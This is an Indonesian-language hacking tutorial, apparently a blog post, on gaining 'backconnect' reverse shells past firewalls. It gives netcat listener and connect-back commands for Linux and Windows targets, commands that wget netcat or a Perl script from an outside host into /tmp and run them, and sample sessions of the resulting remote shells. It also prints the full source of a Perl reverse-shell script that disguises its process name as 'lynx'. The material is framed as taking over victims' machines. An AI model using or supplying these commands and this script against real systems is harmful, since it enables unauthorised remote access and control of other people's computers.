Connect Back Shell

[img=https://web.archive.org/web/20101028020104im_/http://Target/files/post/20106160630_close.JPG]' />

Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.

D:\HACK>nc -vv 192.168.10.10 1968
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 1968 (?): connection refused
sent 0, rcvd 0: NOTSOCK


[img=https://web.archive.org/web/20101028020104im_/http://Target/files/post/20106160630_close.JPG]' />

Percobaan koneksi yang akan kita terima adalah seperti berikut :

D:\HACK>nc -vv 192.168.10.10 1968
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 1968 (?): connection refused
sent 0, rcvd 0: NOTSOCK
Refushed!!!

But no mission are impossible

Bagaimana kita mendapatkan koneksi ke komputer sasaran sementara di depan komputer sasaran ada bodyguard yang selalu memukul dan meluluh-lantak-kan setiap koneksi yang di minta dari luar yang tidak di kenal? Inilah dia. BackConnect.

Seperti yang saya katakan. Backconnect adalah membalikkan koneksi dari komputer sasaran ke komputer attacker yang telah listening pada port tertentu, dengan membawa/meluncurkan aplikasi tertentu, dalam hal ini (hacking) yang akan kita luncurkan (diluncurkan dari sasaran) adalah /bin/bash.

Sehingga ketika komputer sasaran melakukan koneksi ke komputer attacker, komputer attacker akan menerima koneksi, dan akan membuka dan mengaktifkan aplikasi yang di luncurkan oleh komputer sasaran, dalam hal ini adalah /bin/bash. Dengan demikian, attacker mendapatkan akses interaktif /bin/bash dari komputer sasaran. It is interactive console.

[img=https://web.archive.org/web/20101028020104im_/http://target/files/post/20106160630_close.JPG]' />

Sippppppppp.
Teknik untuk melakukan backconnect ini hampir sama dengan bindshell. Tool nya pun kita tetep menggunakan netcat. Netcat emang maknyozz!!.

BackConnect dengan NetCat
Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.

[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...

Sip. Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp.

Command untuk backconnect adalah: nc –vv [ip attacker] [port] –e [launch aplication]

cd /tmp
wget http://hacking.tool/nc
chmod 777 nc
./nc –vv 192.168.10.20 6888 –e /bin/bash

Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.

[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86 _64 x86_64 GNU/Linux

Nah, kan. Kita mendapatkan interaktif console melalui teknik backconnect. Selanjutnya, ya terserah kita mau apa. Obok-obok sampe puas pastinya.
Kalau komputer sasaran adalah windows? Sama aja bos. Hanya aplikasi yang diluncurkan adalah cmd.exe

nc –vv 192.168.10.20 6788 –e cmd.exe

Kemudian kita lihat di komputer kita yang tadi sudah kita set listening.

[root@localhost][/root] nc -vlp 6788
listening on [any] 6788 ...
192.168.10.10: inverse host lookup failed: Unknown host
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 59681
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Windows> <<< dapat!!! Kita telah mendapatkan cmd.exe di komp sasaran
C:\Windows>ipconfig <<< tes lihat ip
ipconfig

Windows IP Configuration
PPP adapter:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.10.10
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 192.168.10.100

D:\Windows>

Nah. Asiiiiiiiiiikkkkkkkkkkkkkkk udah dpt console interaktif. Selanjutnya tinggal command-command sesuka kita.

[b]BackConnect.pl (Backconnect dengan aplikasi perl)[/b]
Nah, ada bindshell.pl ada pula backconnect.pl. fungsinya, jelas untuk melakukan backconnect dengan aplikasi perl. Karena ditulis dengan perl, maka aplikasi ini membutuhkan perl juga di komputer sasaran. Bagaimana ngecek nya kalau user kita bisa jalankan perl? Seperti yang dulu, tetep perl –v. Gak perlu panjang lebar, langsung in action.

Set mode listening di komputer kita.

nc –vlp 9999

Kemudian, kita download backconnect.txt yang sudah kita upload ke hosting kita ke komputer sasaran, di direktory yang writeable tentunya. Seperti biasa pula, langsung menuju /tmp.

Cara pakai backconnectnya: perl backconnect.txt [ip] [port]

cd /tmp
wget http://hacking.tool/backconnect.txt
perl backconnect.txt 192.168.10.20 9999 &

ok. Setelah menjalankan command ini di komputer korban, kembali ke komputer
kita. Dan lihat,kita dapat console sang korban.


[root@localhost][/root] nc -vlp 9999
listening on [any] 9999 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 44808
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86_64 x86_64 GNU/Linux
uid=48(nobody) gid=48(nobody) groups=48(nobody)
pwd
/tmp
whoami
apache

Gotchaaaaaaaa!!!!!!! You are in !!!

BackConnect's Code

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);